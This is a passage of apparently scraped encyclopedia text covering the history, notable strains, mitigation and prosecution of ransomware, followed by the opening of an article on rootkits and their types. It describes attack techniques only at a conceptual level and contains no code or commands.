its use of Windows' built-in encryption APIs), 28 40 41 42 and the August 2014 discovery of a Trojan specifically targeting network-attached storage devices produced by Synology. 43 In January 2015, it was reported that ransomware-styled attacks have occurred against individual websites via hacking, and through ransomware designed to target Linux-based web servers. 44 45 46 In 2022, Costa Rica received widespread Conti ransomware attacks affecting government, healthcare and industry. 47 This lead President Rodrigo Chaves to declare a state of emergency and announce that Costa Rica is "at war" with its ransomware hackers. 48 In some infections, there is a two-stage payload, common in many malware systems. The user is tricked into running a script, which downloads the main virus and executes it. In early versions of the dual-payload system, the script was contained in a Microsoft Office document with an attached VBScript macro, or in a windows scripting facility (WSF) file. As detection systems started blocking these first stage payloads, the Microsoft Malware Protection Center identified a trend away toward LNK files with self-contained Microsoft Windows PowerShell scripts. 49 In 2016, PowerShell was found to be involved in nearly 40% of endpoint security incidents. 50 Some ransomware strains have used proxies tied to Tor hidden services to connect to their command and control servers, increasing the difficulty of tracing the exact location of the criminals. 51 52 Furthermore, dark web vendors have increasingly when? started to offer the technology as a service, wherein ransomware is sold, ready for deployment on victims' machines, on a subscription basis, similarly to Adobe Creative Cloud or Office 365. 52 53 54 Symantec has classified ransomware to be the most dangerous cyber threat. 55 In August 2010, Russian authorities arrested nine individuals connected to a ransomware Trojan known as WinLock. Unlike the previous Gpcode Trojan, WinLock did not use encryption. Instead, WinLock trivially restricted access to the system by displaying pornographic images and asked users to send a premium-rate SMS (costing around US$10) to receive a code that could be used to unlock their machines. The scam hit numerous users across Russia and neighbouring countries—reportedly earning the group over US$16 million. 19 56 In 2011, a ransomware Trojan surfaced that imitated the Windows Product Activation notice, and informed users that a system's Windows installation had to be re-activated due to being a victim of fraud". An online activation option was offered (like the actual Windows activation process), but was unavailable, requiring the user to call one of six international numbers to input a 6 digit code. While the malware claimed that this call would be free, it was routed through a rogue operator in a country with high international phone rates, who placed the call on hold, causing the user to incur large international long-distance charges. 17 In 2012, Symantec reported spread out of Eastern Europe of ransomware with a lock screen purporting to be law enforcement demanding payment for illegal activity. 57 In February 2013, a ransomware Trojan based on the Stamp.EK exploit kit surfaced; the malware was distributed via sites hosted on the project hosting services SourceForge and GitHub that claimed to offer "fake nude pics" of celebrities. 58 In July 2013, an OS X-specific ransomware Trojan surfaced, which displays a web page that accuses the user of downloading pornography. Unlike its Windows-based counterparts, it does not block the entire computer, but simply exploits the behaviour of the web browser itself to frustrate attempts to close the page through normal means. 59 In July 2013, a 21 year-old man from Virginia, whose computer coincidentally did contain pornographic photographs of underage girls with whom he had conducted sexualized communications, turned himself in to police after receiving and being deceived by FBI MoneyPak Ransomware accusing him of possessing child pornography. An investigation discovered the incriminating files, and the man was charged with child sexual abuse and possession of child pornography. 60 The converse of ransomware is a cryptovirology attack invented by Adam L. Young that threatens to publish stolen information from the victim's computer system rather than deny the victim access to it. 61 In a leakware attack, malware exfiltrates sensitive host data either to the attacker or alternatively, to remote instances of the malware, and the attacker threatens to publish the victim's data unless a ransom is paid. The attack was presented at West Point in 2003 and was summarized in the book Malicious Cryptography as follows, "The attack differs from the extortion attack in the following way. In the extortion attack, the victim is denied access to its own valuable information and has to pay to get it back, where in the attack that is presented here the victim retains access to the information but its disclosure is at the discretion of the computer virus". 62 The attack is rooted in game theory and was originally dubbed "non-zero sum games and survivable malware". The attack can yield monetary gain in cases where the malware acquires access to information that may damage the victim user or organization, e.g., the reputational damage that could result from publishing proof that the attack itself was a success. Common targets for exfiltration include: Exfiltration attacks are usually targeted, with a curated victim list, and often preliminary surveillance of the victim's systems to find potential data targets and weaknesses. 63 64 With the increased popularity of ransomware on PC platforms, ransomware targeting mobile operating systems has also proliferated. Typically, mobile ransomware payloads are blockers, as there is little incentive to encrypt data since it can be easily restored via online synchronization. 65 Mobile ransomware typically targets the Android platform, as it allows applications to be installed from third-party sources. 65 66 The payload is typically distributed as an APK file installed by an unsuspecting user; it may attempt to display a blocking message over top of all other applications, 66 while another used a form of clickjacking to cause the user to give it "device administrator" privileges to achieve deeper access to the system. 67 Different tactics have been used on iOS devices, such as exploiting iCloud accounts and using the Find My iPhone system to lock access to the device. 68 On iOS 10.3, Apple patched a bug in the handling of JavaScript pop-up windows in Safari that had been exploited by ransomware websites. 69 It recently when? has been shown that ransomware may also target ARM architectures like those that can be found in various Internet-of-Things (IoT) devices, such as Industrial IoT edge devices. 70 In August 2019 researchers demonstrated it's possible to infect DSLR cameras with ransomware. 71 Digital cameras often use Picture Transfer Protocol (PTP - standard protocol used to transfer files.) Researchers found that it was possible to exploit vulnerabilities in the protocol to infect target camera(s) with ransomware (or execute any arbitrary code). This attack was presented at the Defcon security conference in Las Vegas as a proof of concept attack (not as actual armed malware). The first attacks were on random users, typically infected through email attachments sent by small groups of criminals, demanding a few hundred dollars in cryptocurrency to unlock files (typically a private individual's photographs and documents) that the ransomware had encrypted. As ransomware matured as a business, organised gangs entered the field, advertising on the dark Web for experts, and outsourcing functions. This led to improvement in the quality of ransomware and its success. Rather than random emails, the gangs stole credentials, found vulnerabilities in target networks, and improved the malware to avoid detection by anti-malware scanners. Ransoms demanded escalated into the much larger sums (millions) that an enterprise would pay to recover its data, rather than what an individual would pay for their documents (hundreds). In 2016, a significant uptick in ransomware attacks on hospitals was noted. According to the 2017 Internet Security Threat Report from Symantec Corp, ransomware affected not only IT systems but also patient care, clinical operations, and billing. Online criminals may be motivated by the money available and sense of urgency within the healthcare system. 72 Ransomware is growing rapidly across the internet users but also for the IoT environment. 57 The big problem is that millions of dollars are lost by some organizations and industries that have decided to pay, such as the Hollywood Presbyterian Medical Center and the MedStar Health. 73 According to Symantec 2019 ISTR report, for the first time since 2013, in 2018 there was an observed decrease in ransomware activity with a drop of 20 percent. Before 2017, consumers were the preferred victims, but in 2017 this changed dramatically, it moved to the enterprises. In 2018 this path accelerated with 81 percent infections which represented a 12 percent increase. 74 The common distribution method today is based on email campaigns. In late 2019 ransomware group Maze downloaded companies' sensitive files before locking them, and threatened to leak the data publicly if the ransom was not paid; in at least one case they did this. Many other gangs followed; "leak sites" were created on the dark web where stolen data could be accessed. Later attacks focussed on the threat to leak data, without necessarily locking it—this negated the protection afforded victims by robust backup procedures. As of 2023 update there is a risk of hostile governments using ransomware to conceal what is actually intelligence gathering. 75 The first reported death following a ransomware attack was at a German hospital in October 2020. 76 A significant increase in ransomware attacks occurred during the 2020 COVID 19 pandemic. Evidence has demonstrated that the targeted institutions of these attacks included government, finance, and healthcare. Researchers have contended that several different factors can explain the increase in attacks during this time. However, a major factor is that remote work, which became the norm for many industries in 2020, led to the surge in attacks because of the lack of security in comparison to traditional work environments. 77 In 2012, a major ransomware Trojan known as Reveton began to spread. Based on the Citadel Trojan (which, itself, is based on the Zeus Trojan), its payload displays a warning purportedly from a law enforcement agency claiming that the computer has been used for illegal activities, such as downloading unlicensed software or child pornography. Due to this behaviour, it is commonly referred to as the "Police Trojan". 78 79 80 The warning informs the user that to unlock their system, they would have to pay a fine using a voucher from an anonymous prepaid cash service such as Ukash or paysafecard. To increase the illusion that the computer is being tracked by law enforcement, the screen also displays the computer's IP address, while some versions display footage from a victim's webcam to give the illusion that the user is being recorded. 7 81 Reveton initially began spreading in various European countries in early 2012. 7 Variants were localized with templates branded with the logos of different law enforcement organizations based on the user's country; for example, variants used in the United Kingdom contained the branding of organizations such as the Metropolitan Police Service and the Police National E-Crime Unit. Another version contained the logo of the royalty collection society PRS for Music, which specifically accused the user of illegally downloading music. 82 In a statement warning the public about the malware, the Metropolitan Police clarified that they would never lock a computer in such a way as part of an investigation. 7 18 In May 2012, Trend Micro threat researchers discovered templates for variations for the United States and Canada, suggesting that its authors may have been planning to target users in North America. 83 By August 2012, a new variant of Reveton began to spread in the United States, claiming to require the payment of a $200 fine to the FBI using a MoneyPak card. 8 9 81 In February 2013, a Russian citizen was arrested in Dubai by Spanish authorities for his connection to a crime ring that had been using Reveton; ten other individuals were arrested on money laundering charges. 84 In August 2014, Avast Software reported that it had found new variants of Reveton that also distribute password-stealing malware as part of its payload. 85 Encrypting ransomware reappeared in September 2013 with a Trojan known as CryptoLocker, which generated a 2048 bit RSA key pair and uploaded in turn to a command-and-control server, and used to encrypt files using a whitelist of specific file extensions. The malware threatened to delete the private key if a payment of Bitcoin or a pre-paid cash voucher was not made within 3 days of the infection. Due to the extremely large key size it uses, analysts and those affected by the Trojan considered CryptoLocker extremely difficult to repair. 27 86 87 88 Even after the deadline passed, the private key could still be obtained using an online tool, but the price would increase to 10 BTC—which cost approximately US$2300 as of November 2013. 89 90 CryptoLocker was isolated by the seizure of the Gameover ZeuS botnet as part of Operation Tovar, as officially announced by the U.S. Department of Justice on 2 June 2014. The Department of Justice also publicly issued an indictment against the Russian hacker Evgeniy Bogachev for his alleged involvement in the botnet. 91 92 It was estimated that at least US$3 million was extorted with the malware before the shutdown. 12 In September 2014, a wave of ransomware Trojans surfaced that first targeted users in Australia, under the names CryptoWall and CryptoLocker (which is, as with CryptoLocker 2.0, unrelated to the original CryptoLocker). The Trojans spread via fraudulent e-mails claiming to be failed parcel delivery notices from Australia Post; to evade detection by automatic e-mail scanners that follow all links on a page to scan for malware, this variant was designed to require users to visit a web page and enter a CAPTCHA code before the payload is actually downloaded, preventing such automated processes from being able to scan the payload. Symantec determined that these new variants, which it identified as CryptoLocker.F, were again, unrelated to the original CryptoLocker due to differences in their operation. 93 94 A notable victim of the Trojans was the Australian Broadcasting Corporation; live programming on its television news channel ABC News 24 was disrupted for half an hour and shifted to Melbourne studios due to a CryptoWall infection on computers at its Sydney studio. 95 96 97 Another Trojan in this wave, TorrentLocker, initially contained a design flaw comparable to CryptoDefense; it used the same keystream for every infected computer, making the encryption trivial to overcome. However, this flaw was later fixed. 40 By late-November 2014, it was estimated that over 9,000 users had been infected by TorrentLocker in Australia alone, trailing only Turkey with 11,700 infections. 98 Another major ransomware Trojan targeting Windows, CryptoWall, first appeared in 2014. One strain of CryptoWall was distributed as part of a malvertising campaign on the Zedo ad network in late-September 2014 that targeted several major websites; the ads redirected to rogue websites that used browser plugin exploits to download the payload. A Barracuda Networks researcher also noted that the payload was signed with a digital signature in an effort to appear trustworthy to security software. 99 CryptoWall 3.0 used a payload written in JavaScript as part of an email attachment, which downloads executables disguised as JPG images. To further evade detection, the malware creates new instances of explorer.exe and svchost.exe to communicate with its servers. When encrypting files, the malware also deletes volume shadow copies and installs spyware that steals passwords and Bitcoin wallets. 100 The FBI reported in June 2015 that nearly 1,000 victims had contacted the bureau's Internet Crime Complaint Center to report CryptoWall infections, and estimated losses of at least $18 million. 13 The most recent when? version, CryptoWall 4.0, enhanced its code to avoid antivirus detection, and encrypts not only the data in files but also the file names. 101 Fusob is a major family of mobile ransomware. Between April 2015 and March 2016, about 56 percent of accounted mobile ransomware was Fusob. 102 Like most other pieces of ransomware, it employs scare tactics to extort a hefty sum from the user. 103 The app acts as if it were a notice from the authorities, demanding the victim to pay a fine from $100 to $200 USD or otherwise face a fictitious criminal charge. Fusob requests iTunes gift cards for payment, unlike most cryptocurrency-centric ransomware. In order to infect devices, Fusob masquerades as a pornographic video player. 104 When it is installed, it first checks the device's system language. If the language is Russian or Eastern-European, Fusob remains dormant. Otherwise, it locks the device and demands ransom. About 40% of victims are in Germany, while the United Kingdom encompasses 14.5% of victims and the US encompasses 11.4%. Fusob and Small (another family of ransomware) represented over 93% of mobile ransomware between 2015 and 2016. In May 2017, the WannaCry ransomware attack spread through the Internet, using an exploit vector named EternalBlue, which was allegedly leaked from the U.S. National Security Agency. The ransomware attack, unprecedented in scale, 105 infected more than 230,000 computers in over 150 countries, 106 using 20 different languages to demand money from users using Bitcoin cryptocurrency. WannaCry demanded US$300 per computer. 107 The attack affected Telef nica and several other large companies in Spain, as well as parts of the British National Health Service (NHS), where at least 16 hospitals had to turn away patients or cancel scheduled operations, 108 FedEx, Deutsche Bahn, Honda, 109 Renault, as well as the Russian Interior Ministry and Russian telecom MegaFon. 110 The attackers gave their victims a 7 day deadline from the day their computers got infected, after which the encrypted files would be deleted. 111 Petya was first discovered in March 2016; unlike other forms of encrypting ransomware, the malware aimed to infect the master boot record, installing a payload which encrypts the file tables of the NTFS file system the next time that the infected system boots, blocking the system from booting into Windows at all until the ransom is paid. Check Point reported that despite what it believed to be an innovative evolution in ransomware design, it had resulted in relatively-fewer infections than other ransomware active around the same time frame. 112 On 27 June 2017, a heavily modified version of Petya was used for a global cyberattack primarily targeting Ukraine (but affecting many countries 113 ). This version had been modified to propagate using the same EternalBlue exploit that was used by WannaCry. Due to another design change, it is also unable to actually unlock a system after the ransom is paid; this led to security analysts speculating that the attack was not meant to generate illicit profit, but to simply cause disruption. 114 115 On 24 October 2017, some users in Russia and Ukraine reported a new ransomware attack, named "Bad Rabbit", which follows a similar pattern to WannaCry and Petya by encrypting the user's file tables and then demands a Bitcoin payment to decrypt them. ESET believed the ransomware to have been distributed by a bogus update to Adobe Flash software. 116 Among agencies that were affected by the ransomware were: Interfax, Odesa International Airport, Kyiv Metro, and the Ministry of Infrastructure of Ukraine. 117 As it used corporate network structures to spread, the ransomware was also discovered in other countries, including Turkey, Germany, Poland, Japan, South Korea, and the United States. 118 Experts believed the ransomware attack was tied to the Petya attack in Ukraine (especially because Bad Rabbit's code has many overlapping and analogical elements to the code of Petya NotPetya, 119 appending to CrowdStrike Bad Rabbit and NotPetya's dynamic link library (DLL) share 67 percent of the same code 120 ) though the only identity to the culprits are the names of characters from the Game of Thrones series embedded within the code. 118 Security experts found that the ransomware did not use the EternalBlue exploit to spread, and a simple method to inoculate an unaffected machine running older Windows versions was found by 24 October 2017. 121 122 Further, the sites that had been used to spread the bogus Flash updating have gone offline or removed the problematic files within a few days of its discovery, effectively killing off the spread of Bad Rabbit. 118 In 2016, a new strain of ransomware emerged that was targeting JBoss servers. 123 This strain, named "SamSam", was found to bypass the process of phishing or illicit downloads in favor of exploiting vulnerabilities on weak servers. 124 The malware uses a Remote Desktop Protocol brute-force attack to guess weak passwords until one is broken. The virus has been behind attacks on government and healthcare targets, with notable hacks occurring against the town of Farmington, New Mexico, the Colorado Department of Transportation, Davidson County, North Carolina, and most recently when? , a ransomware attack on the infrastructure of Atlanta. 124 Mohammad Mehdi Shah Mansouri (born in Qom, Iran in 1991) and Faramarz Shahi Savandi (born in Shiraz, Iran, in 1984) are wanted by the FBI for allegedly launching SamSam ransomware. 125 The two have allegedly made $6 million from extortion and caused over $30 million in damages using the malware. 126 On May 7, 2021, a cyberattack was executed on the US Colonial Pipeline. The Federal Bureau of Investigation identified DarkSide as the perpetrator of the Colonial Pipeline ransomware attack, perpetrated by malicious code, that led to a voluntary shutdown of the main pipeline supplying 45% of fuel to the East Coast of the United States. The attack was described as the worst cyberattack to date on the U.S. critical infrastructure. DarkSide successfully extorted about 75 Bitcoin (almost US$5 million) from Colonial Pipeline. U.S. officials are investigating whether the attack was purely criminal or took place with the involvement of the Russian government or another state sponsor. Following the attack, DarkSide posted a statement claiming that "We are apolitical, we do not participate in geopolitics...Our goal is to make money and not creating problems for society. In May 2021, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) issued a joint alert urging the owners and operators of critical infrastructure to take certain steps to reduce their vulnerability to DarkSide ransomware and ransomware in general. Syskey is a utility that was included with Windows NT-based operating systems to encrypt the user account database, optionally with a password. The tool has sometimes been effectively used as ransomware during technical support scams—where a caller with remote access to the computer may use the tool to lock the user out of their computer with a password known only to them. 127 Syskey was removed from later versions of Windows 10 and Windows Server in 2017, due to being obsolete and "known to be used by hackers as part of ransomware scams". 128 129 Ransomware-as-a-service (RaaS) became a notable method after the Russia-based 130 or Russian-speaking 131 group REvil staged operations against several targets, including the Brazil-based JBS S.A. in May 2021, and the US-based Kaseya Limited in July 2021. 132 After a July 9, 2021 phone call between United States president Joe Biden and Russian president Vladimir Putin, Biden told the press, "I made it very clear to him that the United States expects when a ransomware operation is coming from his soil even though it’s not sponsored by the state, we expect them to act if we give them enough information to act on who that is. Biden later added that the United States would take the group's servers down if Putin did not. 133 134 Four days later, REvil websites and other infrastructure vanished from the internet. 135 If an attack is suspected or detected in its early stages, it takes some time for encryption to take place; immediate removal of the malware (a relatively simple process) before it has completed would stop further damage to data, without salvaging any already lost. 136 137 Security experts have suggested precautionary measures for dealing with ransomware. Using software or other security policies to block known payloads from launching will help to prevent infection, but will not protect against all attacks 27 138 As such, having a proper backup solution is a critical component to defending against ransomware. Note that, because many ransomware attackers will not only encrypt the victim's live machine but it will also attempt to delete any hot backups stored locally or on accessible over the network on a NAS, it's also critical to maintain "offline" backups of data stored in locations inaccessible from any potentially infected computer, such as external storage drives or devices that do not have any access to any network (including the Internet), prevents them from being accessed by the ransomware. Moreover, if using a NAS or Cloud storage, then the computer should have append-only permission to the destination storage, such that it cannot delete or overwrite previous backups. According to comodo, applying two Attack Surface Reduction on OS Kernel provides a materially-reduced attack surface which results in a heightened security posture. 139 140 141 Installing security updates issued by software vendors can mitigate the vulnerabilities leveraged by certain strains to propagate. 142 143 144 145 146 Other measures include cyber hygiene exercising caution when opening e-mail attachments and links, network segmentation, and keeping critical computers isolated from networks. 147 148 Furthermore, to mitigate the spread of ransomware measures of infection control can be applied. 149 Such may include disconnecting infected machines from all networks, educational programs, 150 effective communication channels, malware surveillance original research? and ways of collective participation 149 In August 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released a report that provided guidance for how to mitigate ransomware attacks. This was due to a significant jump in recent attacks related to ransomware. These attacks included aggression against a US pipeline company and a software company, which impacted the downstream customers of MSPs. 151 A number of file systems keep snapshots of the data they hold, which can be used to recover the contents of files from a time prior to the ransomware attack in the event the ransomware does not disable it. There are a number of tools intended specifically to decrypt files locked by ransomware, although successful recovery may not be possible. 2 154 If the same encryption key is used for all files, decryption tools use files for which there are both uncorrupted backups and encrypted copies (a known-plaintext attack in the jargon of cryptanalysis. But it only works when the cipher the attacker used was weak to begin with, being vulnerable to known-plaintext attack); recovery of the key, if it is possible, may take several days. 155 Free ransomware decryption tools can help decrypt files encrypted by the following forms of ransomware: AES NI, Alcatraz Locker, Apocalypse, BadBlock, Bart, BTCWare, Crypt888, CryptoMix, CrySiS, EncrypTile, FindZip, Globe, Hidden Tear, Jigsaw, LambdaLocker, Legion, NoobCrypt, Stampado, SZFLocker, TeslaCrypt, XData. 156 Ransomware encryption that has been cracked by security researchers is typically abandoned for criminal purposes; thus in practice most attacks cannot be reverted by breaking encryption. 157 The No More Ransom Project is an initiative by the Netherlands' police's National High Tech Crime Unit, Europol’s European Cybercrime Centre, Kaspersky Lab and McAfee to help ransomware victims recover their data without paying a ransom. 158 They offer a free CryptoSheriff tool to analyze encrypted files and search for decryption tools. 159 In addition, old copies of files may exist on the disk, which has been previously deleted. In some cases, these deleted versions may still be recoverable using software designed for that purpose. A 2019 ProPublica investigation found the cybersecurity firms Proven Data Recovery and Monstercloud, which advertised ransom-free decryption services, would typically simply pay the ransom and charge the victim a higher price. 157 SamSam hackers dealt with Proven Data so frequently that they would recommend the company to victims having technical difficulties making payment. 157 Other companies like Coveware were more transparent in offering the service of paying the hackers and patching insecure systems. 157 Many American victims found the ransom amount was too low to meet the United States Department of Justice threshold for federal involvement, but that local police lacked the technical capabilities to help and were often victims themselves. 157 A British student, Zain Qaiser, from Barking, London was jailed for more than six years at Kingston upon Thames Crown Court for his ransomware attacks in 2019. 160 He is said to have been "the most prolific cyber criminal to be sentenced in the UK". He became active when he was only 17. He contacted the Russian controller of one of the most powerful attacks, believed to be the Lurk malware gang, and arranged for a split of his profits. He also contacted online criminals from China and the US to move the money. 160 For about one and a half years, he posed as a legitimate supplier of online promotions of book advertising on some of the world's most visited legal pornography websites. Each of the adverts that were promoted on the websites contained the Reveton Ransomware strain of the malicious Angler Exploit Kit (AEK) 161 that seized control of the machine. Investigators discovered about 700,000 of earnings, although his network may have earned more than 4m. He may have hidden some money using cryptocurrencies. The ransomware would instruct victims to buy GreenDot MoneyPak vouchers and enter the code in the Reveton panel displayed on the screen. This money entered a MoneyPak account managed by Qaiser, who would then deposit the voucher payments into the debit card account of his American co-conspirator, Raymond Odigie Uadiale. Uadiale was a student at Florida International University during 2012 and 2013 and later worked for Microsoft. Uadiale would convert the money into Liberty Reserve digital currency and deposit it into Qaiser's Liberty Reserve account. 162 A breakthrough, in this case, occurred in May 2013 when authorities from several countries seized the Liberty Reserve servers, obtaining access to all its transactions and account history. Qaiser was running encrypted virtual machines on his Macbook Pro with both Mac and Windows operating systems. 163 He could not be tried earlier because he was sectioned (involuntarily committed) under the UK Mental Health Act of 1983 at Goodmayes Hospital where he was found to be using the hospital Wi-Fi to access his advertising sites. His lawyer claimed that Qaiser had suffered from mental illness. 160 Russian police arrested 50 members of the Lurk malware gang in June 2016. 164 Uadiale, a naturalized US citizen of Nigerian descent, was jailed for 18 months. 165 The publication of proof-of-concept attack code is common among academic researchers and vulnerability researchers. It teaches the nature of the threat, conveys the gravity of the issues, and enables countermeasures to be devised and put into place. However, lawmakers with the support of law-enforcement bodies are contemplating making the creation of ransomware illegal. In the state of Maryland, the original draft of HB 340 made it a felony to create ransomware, punishable by up to 10 years in prison. 166 However, this provision was removed from the final version of the bill. citation needed A minor in Japan was arrested for creating and distributing ransomware code. 167 Young and Yung have had the ANSI C source code to a ransomware cryptotrojan on-line, at cryptovirology.com, since 2005 as part of a cryptovirology book being written. The source code to the cryptotrojan is still live on the Internet and is associated with a draft of Chapter 2. 168 Ransomware Removal |
66 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Rootkit | A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software. 1 The term rootkit is a compound of "root" (the traditional name of the privileged account on Unix-like operating systems) and the word "kit" (which refers to the software components that implement the tool). 2 The term "rootkit" has negative connotations through its association with malware. 1 Rootkit installation can be automated, or an attacker can install it after having obtained root or administrator access. 3 Obtaining this access is a result of direct attack on a system, i.e. exploiting a vulnerability (such as privilege escalation) or a password (obtained by cracking or social engineering tactics like "phishing"). Once installed, it becomes possible to hide the intrusion as well as to maintain privileged access. Full control over a system means that existing software can be modified, including software that might otherwise be used to detect or circumvent it. Rootkit detection is difficult because a rootkit may be able to subvert the software that is intended to find it. Detection methods include using an alternative and trusted operating system, behavior-based methods, signature scanning, difference scanning, and memory dump analysis. Removal can be complicated or practically impossible, especially in cases where the rootkit resides in the kernel; reinstallation of the operating system may be the only available solution to the problem. When dealing with firmware rootkits, removal may require hardware replacement, or specialized equipment. The term rootkit, rkit, or root kit originally referred to a maliciously modified set of administrative tools for a Unix-like operating system that granted "root" access. 4 If an intruder could replace the standard administrative tools on a system with a rootkit, the intruder could obtain root access over the system whilst simultaneously concealing these activities from the legitimate system administrator. These first-generation rootkits were trivial to detect by using tools such as Tripwire that had not been compromised to access the same information. 5 6 Lane Davis and Steven Dake wrote the earliest known rootkit in 1990 for Sun Microsystems' SunOS UNIX operating system. 7 In the lecture he gave upon receiving the Turing award in 1983, Ken Thompson of Bell Labs, one of the creators of Unix, theorized about subverting the C compiler in a Unix distribution and discussed the exploit. The modified compiler would detect attempts to compile the Unix login command and generate altered code that would accept not only the user's correct password, but an additional "backdoor" password known to the attacker. Additionally, the compiler would detect attempts to compile a new version of the compiler, and would insert the same exploits into the new compiler. A review of the source code for the login command or the updated compiler would not reveal any malicious code. 8 This exploit was equivalent to a rootkit. The first documented computer virus to target the personal computer, discovered in 1986, used cloaking techniques to hide itself: the Brain virus intercepted attempts to read the boot sector, and redirected these to elsewhere on the disk, where a copy of the original boot sector was kept. 1 Over time, DOS-virus cloaking methods became more sophisticated. Advanced techniques included hooking low-level disk INT 13H BIOS interrupt calls to hide unauthorized modifications to files. 1 The first malicious rootkit for the Windows NT operating system appeared in 1999: a trojan called NTRootkit created by Greg Hoglund. 9 It was followed by HackerDefender in 2003. 1 The first rootkit targeting Mac OS X appeared in 2009, 10 while the Stuxnet worm was the first to target programmable logic controllers (PLC). 11 In 2005, Sony BMG published CDs with copy protection and digital rights management software called Extended Copy Protection, created by software company First 4 Internet. The software included a music player but silently installed a rootkit which limited the user's ability to access the CD. 12 Software engineer Mark Russinovich, who created the rootkit detection tool RootkitRevealer, discovered the rootkit on one of his computers. 1 The ensuing scandal raised the public's awareness of rootkits. 13 To cloak itself, the rootkit hid any file starting with sys from the user. Soon after Russinovich's report, malware appeared which took advantage of the existing rootkit on affected systems. 1 One BBC analyst called it a "public relations nightmare. 14 Sony BMG released patches to uninstall the rootkit, but it exposed users to an even more serious vulnerability. 15 The company eventually recalled the CDs. In the United States, a class-action lawsuit was brought against Sony BMG. 16 The Greek wiretapping case 2004 05, also referred to as Greek Watergate, 17 involved the illegal telephone tapping of more than 100 mobile phones on the Vodafone Greece network belonging mostly to members of the Greek government and top-ranking civil servants. The taps began sometime near the beginning of August 2004 and were removed in March 2005 without discovering the identity of the perpetrators. The intruders installed a rootkit targeting Ericsson's AXE telephone exchange. According to IEEE Spectrum, this was "the first time a rootkit has been observed on a special-purpose system, in this case an Ericsson telephone switch. 18 The rootkit was designed to patch the memory of the exchange while it was running, enable wiretapping while disabling audit logs, patch the commands that list active processes and active data blocks, and modify the data block checksum verification command. A "backdoor" allowed an operator with sysadmin status to deactivate the exchange's transaction log, alarms and access commands related to the surveillance capability. 18 The rootkit was discovered after the intruders installed a faulty update, which caused SMS texts to be undelivered, leading to an automated failure report being generated. Ericsson engineers were called in to investigate the fault and discovered the hidden data blocks containing the list of phone numbers being monitored, along with the rootkit and illicit monitoring software. Modern rootkits do not elevate access, 4 but rather are used to make another software payload undetectable by adding stealth capabilities. 9 Most rootkits are classified as malware, because the payloads they are bundled with are malicious. For example, a payload might covertly steal user passwords, credit card information, computing resources, or conduct other unauthorized activities. A small number of rootkits may be considered utility applications by their users: for example, a rootkit might cloak a CD-ROM-emulation driver, allowing video game users to defeat anti-piracy measures that require insertion of the original installation media into a physical optical drive to verify that the software was legitimately purchased. Rootkits and their payloads have many uses: In some instances, rootkits provide desired functionality, and may be installed intentionally on behalf of the computer user: There are at least five types of rootkit, ranging from those at the lowest level in firmware (with the highest privileges), through to the least privileged user-based variants that operate in Ring 3. Hybrid combinations of these may occur spanning, for example, user mode and kernel mode. 26 User-mode rootkits run in Ring 3, along with other applications as user, rather than low-level system processes. 27 They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application. Injection mechanisms include: 27 ...since user mode applications all run in their own memory space, the rootkit needs to perform this patching in the memory space of every running application. In addition, the rootkit needs to monitor the system for any new applications that execute and patch those programs' memory space before they fully execute. Kernel-mode rootkits run with the highest operating system privileges (Ring 0) by adding code or replacing portions of the core operating system, including both the kernel and associated device drivers. citation needed Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel-mode rootkits are developed as device drivers or loadable modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. This class of rootkit has unrestricted security access, but is more difficult to write. 29 The complexity makes bugs common, and any bugs in code operating at the kernel level may seriously impact system stability, leading to discovery of the rootkit. 29 One of the first widely known kernel rootkits was developed for Windows NT 4.0 and released in Phrack magazine in 1999 by Greg Hoglund. 30 31 Kernel rootkits can be especially difficult to detect and remove because they operate at the same security level as the operating system itself, and are thus able to intercept or subvert the most trusted operating system operations. Any software, such as antivirus software, running on the compromised system is equally vulnerable. 32 In this situation, no part of the system can be trusted. A rootkit can modify data structures in the Windows kernel using a method known as direct kernel object manipulation (DKOM). 33 This method can be used to hide processes. A kernel mode rootkit can also hook the System Service Descriptor Table (SSDT), or modify the gates between user mode and kernel mode, in order to cloak itself. 4 Similarly for the Linux operating system, a rootkit can modify the system call table to subvert kernel functionality. 34 35 It is common that a rootkit creates a hidden, encrypted filesystem in which it can hide other malware or original copies of files it has infected. 36 Operating systems are evolving to counter the threat of kernel-mode rootkits. For example, 64 bit editions of Microsoft Windows now implement mandatory signing of all kernel-level drivers in order to make it more difficult for untrusted code to execute with the highest privileges in a system. 37 A kernel-mode rootkit variant called a bootkit can infect startup code like the Master Boot Record (MBR), Volume Boot Record (VBR), or boot sector, and in this way can be used to attack full disk encryption systems. 38 An example of such an attack on disk encryption is the "evil maid attack", in which an attacker installs a bootkit on an unattended computer. The envisioned scenario is a maid sneaking into the hotel room where the victims left their hardware. 39 The bootkit replaces the legitimate boot loader with one under their control. Typically the malware loader persists through the transition to protected mode when the kernel has loaded, and is thus able to subvert the kernel. 40 41 42 For example, the "Stoned Bootkit" subverts the system by using a compromised boot loader to intercept encryption keys and passwords. 43 self-published source? In 2010, the Alureon rootkit has successfully subverted the requirement for 64 bit kernel-mode driver signing in Windows 7, by modifying the master boot record. 44 Although not malware in the sense of doing something the user doesn't want, certain "Vista Loader" or "Windows Loader" software work in a similar way by injecting an ACPI SLIC (System Licensed Internal Code) table in the RAM-cached version of the BIOS during boot, in order to defeat the Windows Vista and Windows 7 activation process. citation needed This vector of attack was rendered useless in the (non-server) versions of Windows 8, which use a unique, machine-specific key for each system, that can only be used by that one machine. 45 Many antivirus companies provide free utilities and programs to remove bootkits. Rootkits have been created as Type II Hypervisors in academia as proofs of concept. By exploiting hardware virtualization features such as Intel VT or AMD-V, this type of rootkit runs in Ring 1 and hosts the target operating system as a virtual machine, thereby enabling the rootkit to intercept hardware calls made by the original operating system. 6 Unlike normal hypervisors, they do not have to load before the operating system, but can load into an operating system before promoting it into a virtual machine. 6 A hypervisor rootkit does not have to make any modifications to the kernel of the target to subvert it; however, that does not mean that it cannot be detected by the guest operating system. For example, timing differences may be detectable in CPU instructions. 6 The "SubVirt" laboratory rootkit, developed jointly by Microsoft and University of Michigan researchers, is an academic example of a 